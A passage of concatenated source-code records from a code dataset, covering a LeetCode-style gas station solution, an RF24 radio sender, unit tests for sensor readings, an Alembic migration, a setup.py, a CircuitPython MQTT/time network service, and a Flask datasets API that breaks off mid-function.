\"\"\"\r\n :type gas: List[int]\r\n :type cost: List[int]\r\n :rtype: int\r\n \"\"\"\r\n min_index = -1\r\n min_amount = 0\r\n total_amount = 0\r\n for index in range(len(gas)):\r\n total_amount += gas[index] - cost[index]\r\n if total_amount < min_amount:\r\n min_amount = total_amount\r\n min_index = index\r\n if total_amount < 0:\r\n return -1\r\n else:\r\n return min_index + 1 if min_index < len(gas) - 1 else 0\r\n\r\n","sub_path":"P0134.py","file_name":"P0134.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"14121110","text":"#! /usr/bin/env python\n# coding=utf8\n################################################################\n\"\"\"\nPython Modul zum Senden von Funksignalen im 2,4 GHz Frequenzbereich\n\"\"\"\n################################################################\nfrom RF24 import *\nimport time\n\nclass tx24:\n def __init__(self):\n self.radio = RF24(22, 0);\n self.pipes = [0xF0F0F0F0E1, 0xF0F0F0F0D2]\n self.millis = lambda: int(round(time.time() * 1000))\n self.radio.begin()\n self.radio.enableDynamicPayloads()\n self.radio.setRetries(5, 15)\n self.radio.openWritingPipe(self.pipes[1])\n self.radio.openReadingPipe(1, self.pipes[0])\n def send(self, message):\n try:\n self.radio.stopListening()\n self.radio.write(message)\n print(time.strftime(\"%H:%M:%S\")+\"[TX24] Gesendet: \" + message)\n self.radio.startListening()\n except:\n print(time.strftime(\"%H:%M:%S\")+\"[TX24] Es ist ein Fehler aufgetreten.\")\nif __name__ == \"__main__\":\n\twhile True:\n\t\tmsg = raw_input()\n\t\ttx24().send(msg)\n\t\t","sub_path":"Smarthome_Slave_RaspberryPi/rf/tx24.py","file_name":"tx24.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"440416853","text":"# Add a reading\n# List readings\n# Get readings for a given serial number\n# Get readings for a given date/time range\n#etc\n\nimport unittest\nimport random\nimport datetime as dt\nfrom pathlib import Path\nfrom stored_readings import StoredReadings\nimport os\nimport sqlite3\nimport pandas as pd\n\nclass TestStoredReadings(unittest.TestCase):\n def setUp(self):\n pass\n\n def test_add_readings(self):\n print(\"Starting ADD readings test.\")\n aSR = StoredReadings()\n\n # Create data to send\n for i in range(0, 3):\n x = random.randint(0, 358)\n y = random.randint(0, 358)\n z = random.randint(0, 358)\n d = dt.datetime.now()\n sn = \"46406064\"\n aSR.add_readings(sn, d, x, y, z)\n\n\n n = aSR.get_number_of_readings()\n print('n = {}'.format(n))\n # This returns the highest index\n self.assertTrue(n == 3)\n\n def test_add_readings_to_db(self):\n print(\"Starting ADD readings to DB test\")\n os.chdir('C:\\\\Users\\\\katie\\\\Documents\\\\code\\\\flask-pi-iot')\n print('This is the current working directory {}'.format(os.getcwd()))\n aSR = StoredReadings()\n initial_number = aSR.get_number_of_readings_from_db()\n # Create data to send\n for i in range (0, 3):\n x = random.randint(0, 358)\n y = random.randint(0, 358)\n z = random.randint(0, 358)\n d = dt.datetime.now()\n sn = \"46406064\"\n aSR.add_readings_to_db(sn, d, x, y, z)\n\n ending_number = aSR.get_number_of_readings_from_db()\n self.assertTrue(ending_number-initial_number==3)\n\n def test_list_readings(self):\n print(\"Starting LIST readings test.\")\n aSR = StoredReadings()\n\n # Create data to send\n for i in range(0, 3):\n x = random.randint(0, 358)\n y = random.randint(0, 358)\n z = i\n aSR.add_readings(\"46406064\", dt.datetime.now(), x, y, z)\n aSR.list_readings()\n\n def test_get_first_reading(self):\n print(\"Starting FIRST reading test\")\n aSR = StoredReadings()\n\n for i in range(0, 3):\n x = random.randint(0, 358)\n y = random.randint(0, 358)\n z = random.randint(0, 358)\n aSR.add_readings(\"46406064\", dt.datetime.now(), x, y, z)\n\n print(aSR.get_first_reading())\n\n def test_get_next_reading(self):\n print(\"Starting NEXT reading test\")\n aSR = StoredReadings()\n for i in range(0, 3):\n x = i\n y = random.randint(0, 358)\n z = random.randint(0, 358)\n aSR.add_readings(\"46406064\", dt.datetime.now(), x, y, z)\n g=aSR.get_next_reading()\n print(g)\n self.assertTrue(g['x']==1)\n\n def test_get_all_data_as_list(self):\n print(\"Starting GET ALL DATA AS LIST test\")\n aSR = StoredReadings()\n for i in range(0, 3):\n x = i\n y = random.randint(0, 358)\n z = random.randint(0, 358)\n aSR.add_readings(\"46406064\", dt.datetime.now(), x, y, z)\n\n adal = aSR.get_all_data_as_list()\n print(\"adal: {}\".format(adal))\n print(\"type of adal: {}\".format(type(adal)))\n # test the return type is a list\n self.assertTrue(type(adal) == list)\n # test the difference between the length of the list and the number of readings is 0\n lengthAdal = len(adal)\n numberReadings = aSR.get_number_of_readings()\n n = len(adal) - aSR.get_number_of_readings()\n self.assertTrue(n == 0)\n\n # Testing readings to df\n def test_create_dataframe_for_testing(self):\n print(\"Starting READINGS TO DF test.\")\n aSR = StoredReadings()\n # Create an empty dataframe\n df = aSR.create_dataframe_for_testing()\n self.assertTrue(df.shape[0] == 3)\n\n #In progress pass df to turn into list of dicts\n def test_df_to_list_of_dicts(self):\n print(\"Starting DF TO LIST OF DICTS test\")\n aSR = StoredReadings()\n\n test_df = aSR.create_dataframe_for_testing()\n print(\"This is the test_df {}\".format(test_df))\n list_of_dicts = aSR.df_to_list_of_dicts(test_df)\n\n print(\"The type of component in the list {}\".format(type(list_of_dicts[2])))\n self.assertTrue(type(list_of_dicts) == list)\n self.assertTrue(type(list_of_dicts[2]) == dict)\n\n def test_get_df_from_db_by_serial_no(self):\n print(\"Starting get DF from DB test\")\n #this changes the directory so the test will run using the actual codes directory\n os.chdir('C:\\\\Users\\\\katie\\\\Documents\\\\code\\\\flask-pi-iot')\n print('This is the current working directory {}'.format(os.getcwd()))\n aSR = StoredReadings()\n #connecting to database to delete all test records\n conn = sqlite3.connect('data\\\\readings.db')\n cur = conn.cursor()\n sql_string = \"delete from readings where serial_no = 'DFTEST'\"\n cur.execute(sql_string)\n conn.commit()\n conn.close()\n\n # Create data to send\n for i in range(0, 3):\n x = random.randint(0, 358)\n y = random.randint(0, 358)\n z = random.randint(0, 358)\n d = dt.datetime.now()\n sn = \"DFTEST\"\n aSR.add_readings_to_db(sn, d, x, y, z)\n\n df = aSR.get_df_from_db_by_serial_no(\"DFTEST\")\n print(\"Here is the DF returned from the DB\")\n print(df)\n self.assertTrue(df.shape[0] == 3)\n\n def test_get_unique_serial_no_from_db(self):\n aSR = StoredReadings()\n uniqueSerialNumbers = aSR.get_unique_serial_no_from_db()\n l = len(uniqueSerialNumbers)\n self.assertTrue(l == 4)\n #TODO: Make this more robust because this will fail if data changes (ie more unique serial_nos are added)\n\n\n\n\n\n'''\n def test_excel_maker(self):\n print(\"We are making an excel sheet\")\n aSR = StoredReadings()\n for i in range(0, 3):\n x = i\n y = random.randint(0, 358)\n z = random.randint(0, 358)\n aSR.add_readings(\"46406064\", dt.datetime.now(), x, y, z)\n aSR.excel_maker('my_file_name')\n my_file = Path ('./my_file_name.xlsx')\n\n self.assertTrue(my_file.exists())\n'''\n\nif __name__ == '__main__':\n print(\"Starting Tests.\")\n unittest.main()\n\n\n","sub_path":"library/data_storage/test_stored_readings.py","file_name":"test_stored_readings.py","file_ext":"py","file_size_in_byte":6365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"429575441","text":"\"\"\"empty message\n\nRevision ID: cbf554e24187\nRevises: 4ac3c4e05668\nCreate Date: 2017-08-01 13:35:21.654982\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'cbf554e24187'\ndown_revision = '4ac3c4e05668'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('employees', sa.Column('network_id', sa.String(length=60), nullable=True))\n op.add_column('employees', sa.Column('network_type', sa.String(length=60), nullable=True))\n op.create_index(op.f('ix_employees_network_id'), 'employees', ['network_id'], unique=False)\n op.create_index(op.f('ix_employees_network_type'), 'employees', ['network_type'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_employees_network_type'), table_name='employees')\n op.drop_index(op.f('ix_employees_network_id'), table_name='employees')\n op.drop_column('employees', 'network_type')\n op.drop_column('employees', 'network_id')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/cbf554e24187_.py","file_name":"cbf554e24187_.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"181636022","text":"import setuptools\n\nversion = '0.6'\nsetuptools.setup(\n name='uritemplate',\n version=version,\n url='https://pypi.python.org/packages/source/u/uritemplate/uritemplate-%s.tar.gz' % version,\n license='Apache License, Version 2.0',\n author='Joe Gregorio',\n author_email='jcgregorio@google.com'\n)\n","sub_path":"pkgs/python-uritemplate/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"468606163","text":"import gc\nimport time\nimport board\nfrom digitalio import DigitalInOut\nimport json\nimport rtc\n\nfrom adafruit_esp32spi import adafruit_esp32spi\nfrom adafruit_esp32spi import PWMOut\nfrom adafruit_esp32spi.adafruit_esp32spi_wifimanager import ESPSPI_WiFiManager\nimport adafruit_esp32spi.adafruit_esp32spi_socket as socket\nimport adafruit_logging as logging\nimport adafruit_minimqtt as MQTT\nimport adafruit_requests as requests\nimport adafruit_rgbled\n\ntry:\n from secrets import secrets\nexcept ImportError:\n print(\"secrets.py not found!\")\n raise\n\nTIME_SERVICE = (\n \"https://io.adafruit.com/api/v2/%s/integrations/time/strftime?x-aio-key=%s\"\n)\n# our strftime is %Y-%m-%d %H:%M:%S.%L %j %u %z %Z see http://strftime.net/ for decoding details\n# See https://apidock.com/ruby/DateTime/strftime for full options\nTIME_SERVICE_STRFTIME = (\n \"&fmt=%25Y-%25m-%25d+%25H%3A%25M%3A%25S.%25L+%25j+%25u+%25z+%25Z\"\n)\n\nclass NetworkService:\n def __init__(\n self,\n device_name=\"EnviroPlus\",\n debug=False\n ):\n self.current_time = time.monotonic()\n self.logger = logging.getLogger('enviro+')\n self.device_name = device_name \n self.debug = debug\n self.connected = False\n\n if self.debug:\n self.logger.set_logger_level(\"DEBUG\")\n else:\n self.logger.set_logger_level(\"INFO\")\n\n self._setup_wifi()\n\n def _setup_wifi(self):\n esp32_cs = DigitalInOut(board.D13)\n esp32_reset = DigitalInOut(board.D12)\n esp32_ready = DigitalInOut(board.D11)\n esp32_gpio0 = DigitalInOut(board.D10)\n \n spi = board.SPI()\n self.esp = adafruit_esp32spi.ESP_SPIcontrol(\n spi, esp32_cs, esp32_ready, esp32_reset, esp32_gpio0\n )\n # self._esp._debug = 1\n\n for _ in range(3): # retries\n try:\n self.logger.info(\"ESP firmware: \" + ''.join([chr(b) for b in self.esp.firmware_version]))\n break\n except RuntimeError:\n self.logger.warning(\"Retrying ESP32 connection\")\n time.sleep(1)\n self.esp.reset()\n else:\n self.logger.error(\"Was not able to find ESP32\")\n return\n\n if self.debug:\n while not self.esp.is_connected:\n try:\n self.esp.connect(secrets)\n self.logger.debug(\"IP address is {0}\".format(self.esp.pretty_ip(self.esp.ip_address)))\n except RuntimeError as error:\n self.logger.error(\"Could not connect to internet. {0}\".format(error)) \n\n RED_LED = PWMOut.PWMOut(self.esp, 26)\n GREEN_LED = PWMOut.PWMOut(self.esp, 27)\n BLUE_LED = PWMOut.PWMOut(self.esp, 25)\n status_light = adafruit_rgbled.RGBLED(RED_LED, BLUE_LED, GREEN_LED)\n self.wifi = ESPSPI_WiFiManager(self.esp, secrets, status_light) #, debug=True)\n\n self.wifi.connect()\n\n self.get_local_time()\n\n # MQTT.set_socket(socket, self.esp)\n\n # self.mqtt_client = MQTT.MQTT(broker=secrets['broker'],\n # username=secrets['user'],\n # password=secrets['pass'],\n # is_ssl=False)\n\n if self.debug:\n self.mqtt_client.set_logger_level(\"DEBUG\")\n \n # self.mqtt_client.on_message = self._on_message\n # self.mqtt_client.on_connect = self._on_connect\n # self.mqtt_client.on_disconnect = self._on_disconnected\n # self.mqtt_client.on_publish = self._on_publish\n # self.mqtt_client.on_subscribe = self._on_subscribe\n # self.mqtt_client.on_unsubscribe = self._on_unsubscribe\n \n # self.mqtt_client.connect()\n # self.publish_topic_info()\n # self.mqtt_client.subscribe('homeassistant/sensor/{0}/state'.format(self.device_name))\n\n def _on_message(self, client, topic, message):\n self.logger.debug('MESSAGE: {0}: {1}'.format(topic, message))\n \n def _on_connect(self, client, userdata, flags, rc):\n self.logger.debug('CONNECT: Flags: {0} RC: {1}'.format(flags, rc))\n if rc == 0:\n self.connected = True\n \n def _on_disconnected(self, client, userdata, rc):\n self.logger.debug('DISCONNECT: RC: {0}'.format(rc))\n self._connected = False\n\n def _on_publish(self, client, userdata, topic, pid):\n self.logger.debug('PUBLISH: {0} PID: {1}'.format(topic, pid))\n \n def _on_subscribe(self, client, userdata, topic, granted_qos):\n self.logger.debug('SUBSCRIBE: {0} QOS: {1}'.format(topic, granted_qos))\n \n def _on_unsubscribe(self, client, userdata, topic, pid):\n self.logger.debug('UNSUBSCRIBE: {0} PID: {1}'.format(topic, pid))\n\n def create_payload(self, name, unit, value, uid, model, manufacturer, device_class=None):\n # More info: https://www.home-assistant.io/docs/mqtt/discovery/\n data = {\n \"~\": 'homeassistant/sensor/{0}'.format(self.device_name),\n \"name\": '{0}{1}'.format(self.device_name, name),\n \"stat_t\": '~/state'.format(self.device_name),\n \"unit_of_meas\": '{0}'.format(unit),\n \"val_tpl\": '{0}'.format(value),\n \"uniq_id\": '{0}{1}'.format(self.device_name.lower(), uid),\n # \"dev\": {\n # \"ids\": '{0}_sensor'.format(self.device_name.lower()),\n # \"name\": '{0}Sensors'.format(self.device_name),\n # \"mdl\": '{0}'.format(model),\n # \"mf\": '{0}'.format(manufacturer)\n # }\n }\n if device_class:\n data[\"dev_cla\"] = device_class\n \n return json.dumps(data)\n\n def publish_topic_info(self):\n data = self.create_payload(\"Temp\", \"°C\", \"{{ value_json.temperature}}\", \"_sensor_temperature\", \"BME280\", \"Bosch\", device_class=\"temperature\")\n self.logger.debug(\"Sending {0} bytes\".format(len(data)))\n self.mqtt_client.publish(\n 'homeassistant/sensor/{0}/{1}Temp/config'.format(self.device_name, self.device_name),\n data,\n retain=True, qos=1\n )\n # self.mqtt_client.publish(\n # \"homeassistant/sensor/\"+ self.device_name +\"/\"+ self.device_name +\"Humidity/config\",\n # self.create_payload(\"Humidity\", \"%\", \"{{ value_json.humidity}}\", \"_sensor_humidity\", \"BME280\", \"Bosch\", device_class=\"humidity\"),\n # retain=True, qos=1\n # )\n # self.mqtt_client.publish(\n # \"homeassistant/sensor/\"+ self.device_name +\"/\"+ self.device_name +\"Pressure/config\",\n # self.create_payload(\"Pressure\", \"kPa\", \"{{ value_json.pressure}}\", \"_sensor_pressure\", \"BME280\", \"Bosch\", device_class=\"pressure\"),\n # retain=True, qos=1\n # )\n # self.mqtt_client.publish(\n # \"homeassistant/sensor/\"+ self.device_name +\"/\"+ self.device_name +\"Light/config\",\n # self.create_payload(\"Light\", \"lux\", \"{{ value_json.light}}\", \"_sensor_light\", \"LTR-559\", \"Lite-On\", device_class=\"illuminance\"),\n # retain=True, qos=1\n # )\n # self.mqtt_client.publish(\n # \"homeassistant/sensor/\"+ self.device_name +\"/\"+ self.device_name +\"Oxidising/config\",\n # self.create_payload(\"Oxidising\", \"Ohms\", \"{{ value_json.oxidising}}\", \"_sensor_gas_oxidising\", \"MICS6814\", \"SGX Sensortech\"),\n # retain=True, qos=1\n # )\n # self.mqtt_client.publish(\n # \"homeassistant/sensor/\"+ self.device_name +\"/\"+ self.device_name +\"Reducing/config\",\n # self.create_payload(\"Reducing\", \"Ohms\", \"{{ value_json.reducing}}\", \"_sensor_gas_reducing\", \"MICS6814\", \"SGX Sensortech\"),\n # retain=True, qos=1\n # )\n # self.mqtt_client.publish(\n # \"homeassistant/sensor/\"+ self.device_name +\"/\"+ self.device_name +\"NH3/config\",\n # self.create_payload(\"NH3\", \"Ohms\", \"{{ value_json.nh3}}\", \"_sensor_gas_nh3\", \"MICS6814\", \"SGX Sensortech\"),\n # retain=True, qos=1\n # )\n # self.mqtt_client.publish(\n # \"homeassistant/sensor/\"+ self.device_name +\"/\"+ self.device_name +\"PM1/config\",\n # self.create_payload(\"PM1\", \"ug/m3\", \"{{ value_json.pm1}}\", \"_sensor_pm1\", \"PMS5003\", \"Plantower\"),\n # retain=True, qos=1\n # )\n # self.mqtt_client.publish(\n # \"homeassistant/sensor/\"+ self.device_name +\"/\"+ self.device_name +\"PM25/config\",\n # self.create_payload(\"PM2.5\", \"ug/m3\", \"{{ value_json.pm25}}\", \"_sensor_pm25\", \"PMS5003\", \"Plantower\"),\n # retain=True, qos=1\n # )\n # self.mqtt_client.publish(\n # \"homeassistant/sensor/\"+ self.device_name +\"/\"+ self.device_name +\"PM10/config\",\n # self.create_payload(\"PM10\", \"ug/m3\", \"{{ value_json.pm10}}\", \"_sensor_pm10\", \"PMS5003\", \"Plantower\"),\n # retain=True, qos=1\n # )\n \n def connect_and_send(self, readings):\n if len(readings) > 0:\n self.wifi.connect() \n self.mqtt_client.connect()\n self.mqtt_client.disconnect()\n self.wifi.disconnect()\n else:\n self.logger.warning('No readings, skipping connect')\n\n def get_local_time(self, location=None):\n api_url = None\n try:\n aio_username = secrets[\"aio_username\"]\n aio_key = secrets[\"aio_key\"]\n except KeyError:\n raise KeyError(\n \"\\n\\nOur time service requires a login/password to rate-limit. Please register for a free adafruit.io account and place the user/key in your secrets file under 'aio_username' and 'aio_key'\" # pylint: disable=line-too-long\n )\n\n location = secrets.get(\"timezone\", location)\n if location:\n api_url = (TIME_SERVICE + \"&tz=%s\") % (aio_username, aio_key, location)\n else: # we'll try to figure it out from the IP address\n api_url = TIME_SERVICE % (aio_username, aio_key)\n api_url += TIME_SERVICE_STRFTIME\n try:\n response = requests.get(api_url, timeout=10)\n if response.status_code != 200:\n raise ValueError(response.text)\n if self.debug:\n print(\"Time request: \", api_url)\n print(\"Time reply: \", response.text)\n times = response.text.split(\" \")\n the_date = times[0]\n the_time = times[1]\n year_day = int(times[2])\n week_day = int(times[3])\n is_dst = None # no way to know yet\n except KeyError:\n raise KeyError(\n \"Was unable to lookup the time, try setting secrets['timezone'] according to http://worldtimeapi.org/timezones\"\n )\n year, month, mday = [int(x) for x in the_date.split(\"-\")]\n the_time = the_time.split(\".\")[0]\n hours, minutes, seconds = [int(x) for x in the_time.split(\":\")]\n now = time.struct_time(\n (year, month, mday, hours, minutes, seconds, week_day, year_day, is_dst)\n )\n print(now)\n rtc.RTC().datetime = now\n\n # now clean up\n response.close()\n response = None\n gc.collect()\n","sub_path":"network_service.py","file_name":"network_service.py","file_ext":"py","file_size_in_byte":11218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"286493344","text":"from dataclasses import asdict\n\nfrom flask import Blueprint, Response, abort, current_app as app, jsonify, request\nfrom flask_login import current_user, login_required\nfrom sqlalchemy import distinct, func\nfrom sqlalchemy.orm import contains_eager, joinedload\n\nfrom . import models\nfrom .extensions import db\nfrom .utils import (\n check_admin,\n enum_validate,\n filter_in_enum_or_abort,\n filter_updated_or_abort,\n mixin,\n paged,\n transaction_or_abort,\n)\n\neditable_columns = [\n \"dataset_type\",\n \"notes\",\n \"condition\",\n \"extraction_protocol\",\n \"capture_kit\",\n \"library_prep_method\",\n \"library_prep_date\",\n \"read_length\",\n \"read_type\",\n \"sequencing_id\",\n \"sequencing_date\",\n \"sequencing_centre\",\n \"batch_id\",\n \"discriminator\",\n]\n\ndatasets_blueprint = Blueprint(\n \"datasets\",\n __name__,\n)\n\n\n@datasets_blueprint.route(\"/api/datasets\", methods=[\"GET\"])\n@login_required\n@paged\ndef list_datasets(page: int, limit: int) -> Response:\n order_by = request.args.get(\"order_by\", type=str)\n allowed_columns = [\n \"dataset_type\",\n \"condition\",\n \"notes\",\n \"updated\",\n \"updated_by\",\n \"linked_files\",\n \"tissue_sample_type\",\n \"participant_codename\",\n \"family_codename\",\n ]\n if order_by is None:\n order = None # system default, likely dataset_id\n elif order_by == \"updated_by\":\n order = models.Dataset.updated_by.username\n elif order_by == \"linked_files\":\n order = models.DatasetFile.path\n elif order_by == \"tissue_sample_type\":\n order = models.TissueSample.tissue_sample_type\n elif order_by == \"participant_codename\":\n order = models.Participant.participant_codename\n elif order_by == \"family_codename\":\n order = models.Family.family_codename\n elif order_by in allowed_columns:\n # Since this is an elif clause, we know special cases are already handled above.\n # order_by has been restricted to a known list, so we can safely use getattr\n order = getattr(models.Dataset, order_by)\n else:\n abort(400, description=f\"order_by must be one of {allowed_columns}\")\n\n if order:\n order_dir = request.args.get(\"order_dir\", type=str)\n if order_dir == \"desc\":\n order = order.desc()\n elif order_dir == \"asc\":\n order = order.asc()\n else:\n abort(400, description=\"order_dir must be either 'asc' or 'desc'\")\n\n filters = []\n notes = request.args.get(\"notes\", type=str)\n if notes:\n filters.append(func.instr(models.Dataset.notes, notes))\n updated_by = request.args.get(\"updated_by\", type=str)\n if updated_by:\n filters.append(func.instr(models.User.username, updated_by))\n linked_files = request.args.get(\"linked_files\", type=str)\n if linked_files:\n filters.append(func.instr(models.DatasetFile.path, linked_files))\n participant_codename = request.args.get(\"participant_codename\", type=str)\n if participant_codename:\n filters.append(\n func.instr(models.Participant.participant_codename, participant_codename)\n )\n family_codename = request.args.get(\"family_codename\", type=str)\n if family_codename:\n filters.append(func.instr(models.Family.family_codename, family_codename))\n dataset_type = request.args.get(\"dataset_type\", type=str)\n if dataset_type:\n filters.append(models.Dataset.dataset_type.in_(dataset_type.split(\",\")))\n condition = request.args.get(\"condition\", type=str)\n if condition:\n filters.append(\n filter_in_enum_or_abort(\n models.Dataset.condition, models.DatasetCondition, condition\n )\n )\n tissue_sample_type = request.args.get(\"tissue_sample_type\", type=str)\n if tissue_sample_type:\n filters.append(\n filter_in_enum_or_abort(\n models.TissueSample.tissue_sample_type,\n models.TissueSampleType,\n tissue_sample_type,\n )\n )\n updated = request.args.get(\"updated\", type=str)\n if updated:\n filters.append(filter_updated_or_abort(models.Dataset.updated, updated))\n\n if app.config.get(\"LOGIN_DISABLED\") or current_user.is_admin:\n user_id = request.args.get(\"user\")\n else:\n user_id = current_user.user_id\n if user_id: # Regular user or assumed identity, return only permitted datasets\n query = (\n models.Dataset.query.options(\n contains_eager(models.Dataset.tissue_sample)\n .contains_eager(models.TissueSample.participant)\n .contains_eager(models.Participant.family),\n contains_eager(models.Dataset.tissue_sample)\n .contains_eager(models.TissueSample.participant)\n .joinedload(models.Participant.institution),\n contains_eager(models.Dataset.files),\n contains_eager(models.Dataset.updated_by),\n )\n .join(models.Dataset.tissue_sample)\n .join(models.TissueSample.participant)\n .join(models.Participant.family)\n .outerjoin(models.Dataset.files)\n .join(models.Dataset.updated_by)\n .join(models.groups_datasets_table)\n .join(\n models.users_groups_table,\n models.groups_datasets_table.columns.group_id\n == models.users_groups_table.columns.group_id,\n )\n .filter(models.users_groups_table.columns.user_id == user_id, *filters)\n )\n else: # Admin or LOGIN_DISABLED, authorized to query all datasets\n query = (\n models.Dataset.query.options(\n contains_eager(models.Dataset.tissue_sample)\n .contains_eager(models.TissueSample.participant)\n .contains_eager(models.Participant.family),\n contains_eager(models.Dataset.tissue_sample)\n .contains_eager(models.TissueSample.participant)\n .joinedload(models.Participant.institution),\n contains_eager(models.Dataset.files),\n contains_eager(models.Dataset.updated_by),\n )\n .join(models.Dataset.tissue_sample)\n .join(models.TissueSample.participant)\n .join(models.Participant.family)\n .outerjoin(models.Dataset.files)\n .join(models.Dataset.updated_by)\n .filter(*filters)\n )\n\n total_count = query.with_entities(\n func.count(distinct(models.Dataset.dataset_id))\n ).scalar()\n datasets = query.order_by(order).limit(limit).offset(page * (limit or 0)).all()\n\n return jsonify(\n {\n \"data\": [\n {\n **asdict(dataset),\n \"tissue_sample_type\": dataset.tissue_sample.tissue_sample_type,\n \"participant_codename\": dataset.tissue_sample.participant.participant_codename,\n \"participant_type\": dataset.tissue_sample.participant.participant_type,\n \"institution\": dataset.tissue_sample.participant.institution\n and dataset.tissue_sample.participant.institution.institution,\n \"sex\": dataset.tissue_sample.participant.sex,\n \"family_codename\": dataset.tissue_sample.participant.family.family_codename,\n \"created_by\": dataset.tissue_sample.created_by.username,\n \"updated_by\": dataset.tissue_sample.updated_by.username,\n }\n for dataset in datasets\n ],\n \"page\": page if limit else 0,\n \"total_count\": total_count,\n }\n )\n\n\n@datasets_blueprint.route(\"/api/datasets/\", methods=[\"GET\"])\n@login_required\ndef get_dataset(id: int):\n if app.config.get(\"LOGIN_DISABLED\") or current_user.is_admin:\n user_id = request.args.get(\"user\")\n else:\n user_id = current_user.user_id\n\n if user_id:\n dataset = (\n models.Dataset.query.filter_by(dataset_id=id)\n .options(\n joinedload(models.Dataset.analyses),\n joinedload(models.Dataset.created_by),\n joinedload(models.Dataset.updated_by),\n joinedload(models.Dataset.tissue_sample)\n .joinedload(models.TissueSample.participant)\n .joinedload(models.Participant.family),\n )\n .join(models.groups_datasets_table)\n .join(\n models.users_groups_table,\n models.groups_datasets_table.columns.group_id\n == models.users_groups_table.columns.group_id,\n )\n .filter(models.users_groups_table.columns.user_id == user_id)\n .first_or_404()\n )\n else:\n dataset = (\n models.Dataset.query.filter_by(dataset_id=id)\n .options(\n joinedload(models.Dataset.analyses),\n joinedload(models.Dataset.created_by),\n joinedload(models.Dataset.updated_by),\n joinedload(models.Dataset.tissue_sample)\n .joinedload(models.TissueSample.participant)\n .joinedload(models.Participant.family),\n )\n .first_or_404()\n )\n\n return jsonify(\n {\n **asdict(dataset),\n \"tissue_sample\": dataset.tissue_sample,\n \"participant_codename\": dataset.tissue_sample.participant.participant_codename,\n \"participant_type\": dataset.tissue_sample.participant.participant_type,\n \"institution\": dataset.tissue_sample.participant.institution.institution\n if dataset.tissue_sample.participant.institution\n else None,\n \"sex\": dataset.tissue_sample.participant.sex,\n \"family_codename\": dataset.tissue_sample.participant.family.family_codename,\n \"created_by\": dataset.tissue_sample.participant.created_by.username,\n \"updated_by\": dataset.tissue_sample.participant.updated_by.username,\n \"analyses\": [\n {\n **asdict(analysis),\n \"requester\": analysis.requester.username,\n \"updated_by\": analysis.updated_by.username,\n \"assignee\": analysis.assignee.username,\n }\n for analysis in dataset.analyses\n ],\n }\n )\n\n\n@datasets_blueprint.route(\"/api/datasets/\", methods=[\"PATCH\"])\n@login_required\ndef update_dataset(id: int):\n if not request.json:\n abort(415, description=\"Request body must be JSON\")\n\n if app.config.get(\"LOGIN_DISABLED\") or current_user.is_admin:\n user_id = request.args.get(\"user\")\n else:\n user_id = current_user.user_id\n\n if user_id:\n dataset = (\n models.Dataset.query.filter_by(dataset_id=id)\n .join(models.groups_datasets_table)\n .join(\n models.users_groups_table,\n models.groups_datasets_table.columns.group_id\n == models.users_groups_table.columns.group_id,\n )\n .filter(models.users_groups_table.columns.user_id == user_id)\n .first_or_404()\n )\n else:\n dataset = models.Dataset.query.filter_by(dataset_id=id).first_or_404()\n\n enum_error = mixin(dataset, request.json, editable_columns)\n\n if enum_error:\n abort(400, description=enum_error)\n\n if \"linked_files\" in request.json:\n for existing in dataset.files:\n if existing.path not in request.json[\"linked_files\"]:\n db.session.delete(existing)\n for path in request.json[\"linked_files\"]:\n if path not in dataset.linked_files:\n dataset.files.append(models.DatasetFile(path=path))\n\n if user_id:\n dataset.updated_by_id = user_id\n\n transaction_or_abort(db.session.commit)\n\n return jsonify(\n {\n **asdict(dataset),\n \"updated_by\": dataset.updated_by.username,\n \"created_by\": dataset.created_by.username,\n }\n )\n\n\n@datasets_blueprint.route(\"/api/datasets/\", methods=[\"DELETE\"])\n@login_required\n@check_admin\ndef delete_dataset(id: int):\n dataset = (\n models.Dataset.query.filter(models.Dataset.dataset_id == id)\n .options(joinedload(models.Dataset.analyses))\n .first_or_404()\n )\n if not dataset.analyses:\n try:\n db.session.delete(dataset)\n db.session.commit()\n return \"Updated\", 204\n except:\n db.session.rollback()\n abort(500, description=\"Server error\")\n else:\n abort(422, description=\"Dataset has analyses, cannot delete\")\n\n\n@datasets_blueprint.route(\"/api/datasets\", methods=[\"POST\"])\n@login_required\ndef create_dataset():\n if not request.json:\n abort(415, description=\"Request body must be JSON\")\n\n dataset_type = request.json.get(\"dataset_type\")\n if not dataset_type:\n abort(400, description=\"A dataset type must be provided\")\n\n tissue_sample_id = request.json.get(\"tissue_sample_id\")\n if not tissue_sample_id:\n abort(400, description=\"A tissue sample id must be provided\")\n\n sequencing_date = request.json.get(\"sequencing_date\")\n if not sequencing_date:\n abort(400, description=\"A sequencing date must be provided\")\n\n models.TissueSample.query.filter_by(\n tissue_sample_id=tissue_sample_id\n ).first_or_404()\n\n enum_error = enum_validate(models.Dataset, request.json, editable_columns)\n\n if enum_error:\n abort(400, description=enum_error)\n\n try:\n created_by_id = updated_by_id = current_user.user_id\n except: # LOGIN DISABLED\n created_by_id = updated_by_id = 1\n\n dataset = models.Dataset(\n **{\n \"tissue_sample_id\": tissue_sample_id,\n \"dataset_type\": dataset_type,\n \"notes\": request.json.get(\"notes\"),\n \"condition\": request.json.get(\"condition\"),\n \"extraction_protocol\": request.json.get(\"extraction_protocol\"),\n \"capture_kit\": request.json.get(\"capture_kit\"),\n \"library_prep_method\": request.json.get(\"library_prep_method\"),\n \"library_prep_date\": request.json.get(\"library_prep_date\"),\n \"read_length\": request.json.get(\"read_length\"),\n \"read_type\": 